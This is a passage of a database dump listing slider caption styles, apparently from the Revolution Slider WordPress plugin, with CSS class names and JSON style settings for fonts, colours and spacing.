12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(32,'.tp-caption.medium_bg_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(227, 58, 12)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(33,'.tp-caption.medium_bold_orange','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(243, 156, 18)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(34,'.tp-caption.medium_bg_orange','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(243, 156, 18)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(35,'.tp-caption.grassfloor','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"text-decoration\":\"none\",\"background-color\":\"rgba(160, 179, 151, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}','{\"idle\":{\"width\":\"4000px\",\"height\":\"150px\"},\"hover\":\"\"}'),(36,'.tp-caption.large_bold_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(37,'.tp-caption.medium_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(38,'.tp-caption.mediumlarge_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(39,'.tp-caption.mediumlarge_light_white_center','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px 0px 0px 0px\",\"text-align\":\"center\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(40,'.tp-caption.medium_bg_asbestos','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(127, 140, 141)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(41,'.tp-caption.medium_light_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(42,'.tp-caption.large_bold_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(43,'.tp-caption.mediumlarge_light_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(44,'.tp-caption.small_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"17px\",\"line-height\":\"28px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(45,'.tp-caption.roundedimage','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(46,'.tp-caption.large_bg_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(0, 0, 0)\",\"padding\":\"10px 20px 15px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(47,'.tp-caption.mediumwhitebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(255, 255, 255)\",\"padding\":\"5px 15px 10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(0, 0, 0)\",\"border-style\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(48,'.tp-caption.MarkerDisplay','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ff0000\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"font-style\":\"normal\",\"font-family\":\"Permanent Marker\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(49,'.tp-caption.Restaurant-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"color\":\"#ffffff\",\"font-size\":\"120px\",\"line-height\":\"120px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(50,'.tp-caption.Restaurant-Cursive','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Nothing you could do\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(51,'.tp-caption.Restaurant-ScrollDownText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"color\":\"#ffffff\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(52,'.tp-caption.Restaurant-Description','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"color\":\"#ffffff\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(53,'.tp-caption.Restaurant-Price','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(54,'.tp-caption.Restaurant-Menuitem','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"power2.inOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(55,'.tp-caption.Furniture-LogoText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"160px\",\"line-height\":\"150px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(56,'.tp-caption.Furniture-Plus','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0.5\",\"easing\":\"none\"}','{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"6px\",\"7px\",\"4px\",\"7px\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"text-shadow\":\"none\",\"box-shadow\":\"rgba(0,0,0,0.1) 0 1px 3px\"},\"hover\":\"\"}'),(57,'.tp-caption.Furniture-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(58,'.tp-caption.Furniture-Subtitle','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(59,'.tp-caption.Gym-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":\"\",\"hover\":\"\"}'),(60,'.tp-caption.Gym-Subline','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}'),(61,'.tp-caption.Gym-SmallText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"22\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(62,'.tp-caption.Fashion-SmallText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"20px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-col